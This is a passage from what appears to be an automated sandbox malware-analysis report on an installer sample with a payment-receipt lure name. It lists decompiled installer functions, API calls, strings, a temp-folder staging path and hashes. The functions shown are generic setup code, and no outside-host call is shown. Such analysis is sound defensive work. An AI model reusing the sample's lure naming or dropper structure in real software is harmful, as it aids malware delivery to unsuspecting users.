                                        				intOrPtr* _t62;
                                        				intOrPtr* _t64;
                                        				intOrPtr* _t66;
                                        				intOrPtr* _t68;
                                        				intOrPtr* _t70;
                                        				intOrPtr* _t72;
                                        				intOrPtr* _t74;
                                        				intOrPtr* _t76;
                                        				intOrPtr* _t78;
                                        				intOrPtr* _t80;
                                        				void* _t83;
                                        				intOrPtr* _t91;
                                        				signed int _t101;
                                        				signed int _t105;
                                        				void* _t107;
                                        
                                        				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
                                        				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
                                        				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
                                        				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
                                        				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
                                        				_t52 =  *(_t107 - 0x18);
                                        				 *(_t107 - 0x44) = _t52 & 0x00000fff;
                                        				_t101 = _t52 & 0x00008000;
                                        				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                        				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
                                        				if(E00405BA7( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
                                        					E00402C37(0x21);
                                        				}
                                        				_t56 = _t107 + 8;
                                        				__imp__CoCreateInstance(0x4084dc, _t83, "true", 0x4084cc, _t56);
                                        				if(_t56 < _t83) {
                                        					L14:
                                        					 *((intOrPtr*)(_t107 - 4)) = 1;
                                        					_push(0xfffffff0);
                                        				} else {
                                        					_t60 =  *((intOrPtr*)(_t107 + 8));
                                        					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ec, _t107 - 0x30);
                                        					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
                                        					if(_t61 >= _t83) {
                                        						_t64 =  *((intOrPtr*)(_t107 + 8));
                                        						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
                                        						if(_t101 == _t83) {
                                        							_t80 =  *((intOrPtr*)(_t107 + 8));
                                        							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated\\Stereoing");
                                        						}
                                        						if(_t105 != _t83) {
                                        							_t78 =  *((intOrPtr*)(_t107 + 8));
                                        							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                        						}
                                        						_t66 =  *((intOrPtr*)(_t107 + 8));
                                        						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
                                        						_t91 =  *((intOrPtr*)(_t107 - 0x48));
                                        						if( *_t91 != _t83) {
                                        							_t76 =  *((intOrPtr*)(_t107 + 8));
                                        							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
                                        						}
                                        						_t68 =  *((intOrPtr*)(_t107 + 8));
                                        						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                        						_t70 =  *((intOrPtr*)(_t107 + 8));
                                        						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                        						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
                                        							_t74 =  *((intOrPtr*)(_t107 - 0x30));
                                        							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), "true");
                                        						}
                                        						_t72 =  *((intOrPtr*)(_t107 - 0x30));
                                        						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                        					}
                                        					_t62 =  *((intOrPtr*)(_t107 + 8));
                                        					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                        					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
                                        						_push(0xfffffff4);
                                        					} else {
                                        						goto L14;
                                        					}
                                        				}
                                        				E00401423();
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t107 - 4));
                                        				return 0;
                                        			}






















                                        0x00402107
                                        0x00402111
                                        0x0040211b
                                        0x00402125
                                        0x00402130
                                        0x00402133
                                        0x0040214d
                                        0x00402150
                                        0x00402156
                                        0x00402159
                                        0x00402163
                                        0x00402167
                                        0x00402167
                                        0x0040216c
                                        0x0040217d
                                        0x00402185
                                        0x0040223c
                                        0x0040223c
                                        0x00402243
                                        0x0040218b
                                        0x0040218b
                                        0x0040219a
                                        0x0040219e
                                        0x004021a1
                                        0x004021a7
                                        0x004021b5
                                        0x004021b8
                                        0x004021ba
                                        0x004021c5
                                        0x004021c5
                                        0x004021ca
                                        0x004021cc
                                        0x004021d3
                                        0x004021d3
                                        0x004021d6
                                        0x004021df
                                        0x004021e2
                                        0x004021e8
                                        0x004021ea
                                        0x004021f4
                                        0x004021f4
                                        0x004021f7
                                        0x00402200
                                        0x00402203
                                        0x0040220c
                                        0x00402212
                                        0x00402214
                                        0x00402222
                                        0x00402222
                                        0x00402225
                                        0x0040222b
                                        0x0040222b
                                        0x0040222e
                                        0x00402234
                                        0x0040223a
                                        0x0040224f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040223a
                                        0x00402245
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Stereoing, xrefs: 004021BD
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CreateInstance
                                        • String ID: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Stereoing
                                        • API String ID: 542301482-2217710947
                                        • Opcode ID: 75bd8e49128f364a0fc7c4c1a7bdc2d45d81300e390856c6e58ec56fd8bb38af
                                        • Instruction ID: 12128347f435f69461b39f0114e3e01667000ffa0243525f0bda7dd6f9c1772f
                                        • Opcode Fuzzy Hash: 75bd8e49128f364a0fc7c4c1a7bdc2d45d81300e390856c6e58ec56fd8bb38af
                                        • Instruction Fuzzy Hash: BF4139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 39%
                                        			E00402862(short __ebx, short* __esi) {
                                        				void* _t21;
                                        
                                        				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
                                        					E004061A6( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                        					_push(_t21 - 0x2a8);
                                        					_push(__esi);
                                        					E0040625F();
                                        				} else {
                                        					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                        					 *__esi = __ebx;
                                        					 *((intOrPtr*)(_t21 - 4)) = 1;
                                        				}
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t21 - 4));
                                        				return 0;
                                        			}




                                        0x0040287a
                                        0x00402895
                                        0x004028a0
                                        0x004028a1
                                        0x004029db
                                        0x0040287c
                                        0x0040287f
                                        0x00402882
                                        0x00402885
                                        0x00402885
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: 6634e00a7cf8ae9f81784cc3fd27b444408b2eeaa47297c107ee77c483e0c32a
                                        • Instruction ID: cb5017da262a82374af33b7b9c4435bd67f431664fd16e1eaa48b990974d77dd
                                        • Opcode Fuzzy Hash: 6634e00a7cf8ae9f81784cc3fd27b444408b2eeaa47297c107ee77c483e0c32a
                                        • Instruction Fuzzy Hash: 88F08C71A04104AFDB10EBA4DE49AADB378EF10314F2046BBF501F21D1DBB84E819B2A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E00404391(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                        				intOrPtr _v8;
                                        				int _v12;
                                        				void* _v16;
                                        				struct HWND__* _t56;
                                        				intOrPtr _t69;
                                        				signed int _t75;
                                        				signed short* _t76;
                                        				signed short* _t78;
                                        				long _t92;
                                        				int _t103;
                                        				signed int _t108;
                                        				signed int _t110;
                                        				intOrPtr _t111;
                                        				intOrPtr _t113;
                                        				WCHAR* _t114;
                                        				signed int* _t116;
                                        				WCHAR* _t117;
                                        				struct HWND__* _t118;
                                        
                                        				if(_a8 != 0x110) {
                                        					__eflags = _a8 - 0x111;
                                        					if(_a8 != 0x111) {
                                        						L13:
                                        						__eflags = _a8 - 0x4e;
                                        						if(_a8 != 0x4e) {
                                        							__eflags = _a8 - 0x40b;
                                        							if(_a8 == 0x40b) {
                                        								 *0x79feec =  *0x79feec + 1;
                                        								__eflags =  *0x79feec;
                                        							}
                                        							L27:
                                        							_t114 = _a16;
                                        							L28:
                                        							return E0040425B(_a8, _a12, _t114);
                                        						}
                                        						_t56 = GetDlgItem(_a4, 0x3e8);
                                        						_t114 = _a16;
                                        						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
                                        						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
                                        							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
                                        							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                        								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                        								_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                        								_v12 = _t103;
                                        								__eflags = _t103 - _t113 - 0x800;
                                        								_v16 = _t113;
                                        								_v8 = 0x7a69c0;
                                        								if(_t103 - _t113 < 0x800) {
                                        									SendMessageW(_t56, 0x44b, 0,  &_v16);
                                        									SetCursor(LoadCursorW(0, 0x7f02));
                                        									_push("true");
                                        									E00404640(_a4, _v8);
                                        									SetCursor(LoadCursorW(0, 0x7f00));
                                        									_t114 = _a16;
                                        								}
                                        							}
                                        						}
                                        						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
                                        						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
                                        							goto L28;
                                        						} else {
                                        							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
                                        							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                        								goto L28;
                                        							}
                                        							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
                                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                        								SendMessageW( *0x7a8a28, 0x111, "true", 0);
                                        							}
                                        							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
                                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                        								SendMessageW( *0x7a8a28, 0x10, 0, 0);
                                        							}
                                        							return 1;
                                        						}
                                        					}
                                        					__eflags = _a12 >> 0x10;
                                        					if(_a12 >> 0x10 != 0) {
                                        						goto L27;
                                        					}
                                        					__eflags =  *0x79feec; // 0x0
                                        					if(__eflags != 0) {
                                        						goto L27;
                                        					}
                                        					_t69 =  *0x7a0ef8; // 0x87e0fc
                                        					_t29 = _t69 + 0x14; // 0x87e110
                                        					_t116 = _t29;
                                        					__eflags =  *_t116 & 0x00000020;
                                        					if(( *_t116 & 0x00000020) == 0) {
                                        						goto L27;
                                        					}
                                        					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                        					__eflags = _t108;
                                        					 *_t116 = _t108;
                                        					E00404216(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                        					E0040461C();
                                        					goto L13;
                                        				} else {
                                        					_t117 = _a16;
                                        					_t75 =  *(_t117 + 0x30);
                                        					if(_t75 < 0) {
                                        						_t111 =  *0x7a79fc; // 0x880d16
                                        						_t75 =  *(_t111 - 4 + _t75 * 4);
                                        					}
                                        					_t76 =  *0x7a8a78 + _t75 * 2;
                                        					_t110 =  *_t76 & 0x0000ffff;
                                        					_a8 = _t110;
                                        					_t78 =  &(_t76[1]);
                                        					_a16 = _t78;
                                        					_v16 = _t78;
                                        					_v12 = 0;
                                        					_v8 = E00404342;
                                        					if(_t110 != 2) {
                                        						_v8 = E00404308;
                                        					}
                                        					_push( *((intOrPtr*)(_t117 + 0x34)));
                                        					_push(0x22);
                                        					E004041F4(_a4);
                                        					_push( *((intOrPtr*)(_t117 + 0x38)));
                                        					_push(0x23);
                                        					E004041F4(_a4);
                                        					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, "true");
                                        					E00404216( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                        					_t118 = GetDlgItem(_a4, 0x3e8);
                                        					E00404229(_t118);
                                        					SendMessageW(_t118, 0x45b, "true", 0);
                                        					_t92 =  *( *0x7a8a34 + 0x68);
                                        					if(_t92 < 0) {
                                        						_t92 = GetSysColor( ~_t92);
                                        					}
                                        					SendMessageW(_t118, 0x443, 0, _t92);
                                        					SendMessageW(_t118, 0x445, 0, 0x4010000);
                                        					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                        					 *0x79feec = 0;
                                        					SendMessageW(_t118, 0x449, _a8,  &_v16);
                                        					 *0x79feec = 0;
                                        					return 0;
                                        				}
                                        			}





















                                        0x004043a3
                                        0x004044c3
                                        0x004044d0
                                        0x0040452d
                                        0x0040452d
                                        0x00404531
                                        0x004045f7
                                        0x004045fe
                                        0x00404600
                                        0x00404600
                                        0x00404600
                                        0x00404606
                                        0x00404606
                                        0x00404609
                                        0x00000000
                                        0x00404610
                                        0x0040453f
                                        0x00404545
                                        0x00404548
                                        0x0040454f
                                        0x00404551
                                        0x00404558
                                        0x0040455a
                                        0x0040455d
                                        0x00404560
                                        0x00404565
                                        0x0040456b
                                        0x0040456e
                                        0x00404575
                                        0x00404582
                                        0x00404593
                                        0x00404599
                                        0x004045a1
                                        0x004045af
                                        0x004045b5
                                        0x004045b5
                                        0x00404575
                                        0x00404558
                                        0x004045b8
                                        0x004045bf
                                        0x00000000
                                        0x004045c1
                                        0x004045c1
                                        0x004045c8
                                        0x00000000
                                        0x00000000
                                        0x004045ca
                                        0x004045ce
                                        0x004045de
                                        0x004045de
                                        0x004045e0
                                        0x004045e4
                                        0x004045f0
                                        0x004045f0
                                        0x00000000
                                        0x004045f4
                                        0x004045bf
                                        0x004044d8
                                        0x004044db
                                        0x00000000
                                        0x00000000
                                        0x004044e1
                                        0x004044e7
                                        0x00000000
                                        0x00000000
                                        0x004044ed
                                        0x004044f2
                                        0x004044f2
                                        0x004044f5
                                        0x004044f8
                                        0x00000000
                                        0x00000000
                                        0x0040451f
                                        0x0040451f
                                        0x00404521
                                        0x00404523
                                        0x00404528
                                        0x00000000
                                        0x004043a9
                                        0x004043a9
                                        0x004043ac
                                        0x004043b1
                                        0x004043b3
                                        0x004043c2
                                        0x004043c2
                                        0x004043ca
                                        0x004043cd
                                        0x004043d1
                                        0x004043d4
                                        0x004043d8
                                        0x004043db
                                        0x004043de
                                        0x004043e1
                                        0x004043e8
                                        0x004043ea
                                        0x004043ea
                                        0x004043f4
                                        0x00404401
                                        0x0040440b
                                        0x00404410
                                        0x00404413
                                        0x00404418
                                        0x0040442f
                                        0x00404436
                                        0x00404449
                                        0x0040444c
                                        0x00404460
                                        0x00404467
                                        0x0040446c
                                        0x00404471
                                        0x00404471
                                        0x0040447f
                                        0x0040448d
                                        0x0040449f
                                        0x004044a4
                                        0x004044b4
                                        0x004044b6
                                        0x00000000
                                        0x004044bc

                                        APIs
                                        • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040442F
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404443
                                        • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404460
                                        • GetSysColor.USER32(?), ref: 00404471
                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040447F
                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040448D
                                        • lstrlenW.KERNEL32(?), ref: 00404492
                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040449F
                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044B4
                                        • GetDlgItem.USER32(?,0000040A), ref: 0040450D
                                        • SendMessageW.USER32(00000000), ref: 00404514
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040453F
                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404582
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404590
                                        • SetCursor.USER32(00000000), ref: 00404593
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004045AC
                                        • SetCursor.USER32(00000000), ref: 004045AF
                                        • SendMessageW.USER32(00000111,?,00000000), ref: 004045DE
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: Call$N
                                        • API String ID: 3103080414-3438112850
                                        • Opcode ID: 631cabfc39bdc86844b6c5ef759f4df1482c42644a70fa64dc4549b5ea516eb1
                                        • Instruction ID: 51cb052740ae368b0964ded38bc47e0fd82963d20e12a5d8f79ead0afd290bbe
                                        • Opcode Fuzzy Hash: 631cabfc39bdc86844b6c5ef759f4df1482c42644a70fa64dc4549b5ea516eb1
                                        • Instruction Fuzzy Hash: 636190B1900209BFDB10DF60DD45AAA7B69FB85344F00853AF705B61E0DB7DA951CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 90%
                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                        				struct tagLOGBRUSH _v16;
                                        				struct tagRECT _v32;
                                        				struct tagPAINTSTRUCT _v96;
                                        				struct HDC__* _t70;
                                        				struct HBRUSH__* _t87;
                                        				struct HFONT__* _t94;
                                        				long _t102;
                                        				signed int _t126;
                                        				struct HDC__* _t128;
                                        				intOrPtr _t130;
                                        
                                        				if(_a8 == 0xf) {
                                        					_t130 =  *0x7a8a34;
                                        					_t70 = BeginPaint(_a4,  &_v96);
                                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                        					_a8 = _t70;
                                        					GetClientRect(_a4,  &_v32);
                                        					_t126 = _v32.bottom;
                                        					_v32.bottom = _v32.bottom & 0x00000000;
                                        					while(_v32.top < _t126) {
                                        						_a12 = _t126 - _v32.top;
                                        						asm("cdq");
                                        						asm("cdq");
                                        						asm("cdq");
                                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                        						_t87 = CreateBrushIndirect( &_v16);
                                        						_v32.bottom = _v32.bottom + 4;
                                        						_a16 = _t87;
                                        						FillRect(_a8,  &_v32, _t87);
                                        						DeleteObject(_a16);
                                        						_v32.top = _v32.top + 4;
                                        					}
                                        					if( *(_t130 + 0x58) != 0xffffffff) {
                                        						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                        						_a16 = _t94;
                                        						if(_t94 != 0) {
                                        							_t128 = _a8;
                                        							_v32.left = 0x10;
                                        							_v32.top = 8;
                                        							SetBkMode(_t128, "true");
                                        							SetTextColor(_t128,  *(_t130 + 0x58));
                                        							_a8 = SelectObject(_t128, _a16);
                                        							DrawTextW(_t128, "Blass Setup", 0xffffffff,  &_v32, 0x820);
                                        							SelectObject(_t128, _a8);
                                        							DeleteObject(_a16);
                                        						}
                                        					}
                                        					EndPaint(_a4,  &_v96);
                                        					return 0;
                                        				}
                                        				_t102 = _a16;
                                        				if(_a8 == 0x46) {
                                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                        					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a28;
                                        				}
                                        				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                        			}













                                        0x0040100a
                                        0x00401039
                                        0x00401047
                                        0x0040104d
                                        0x00401051
                                        0x0040105b
                                        0x00401061
                                        0x00401064
                                        0x004010f3
                                        0x00401089
                                        0x0040108c
                                        0x004010a6
                                        0x004010bd
                                        0x004010cc
                                        0x004010cf
                                        0x004010d5
                                        0x004010d9
                                        0x004010e4
                                        0x004010ed
                                        0x004010ef
                                        0x004010ef
                                        0x00401100
                                        0x00401105
                                        0x0040110d
                                        0x00401110
                                        0x00401112
                                        0x00401118
                                        0x0040111f
                                        0x00401126
                                        0x00401130
                                        0x00401142
                                        0x00401156
                                        0x00401160
                                        0x00401165
                                        0x00401165
                                        0x00401110
                                        0x0040116e
                                        0x00000000
                                        0x00401178
                                        0x00401010
                                        0x00401013
                                        0x00401015
                                        0x0040101f
                                        0x0040101f
                                        0x00000000

                                        APIs
                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,?), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextW.USER32(00000000,Blass Setup,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
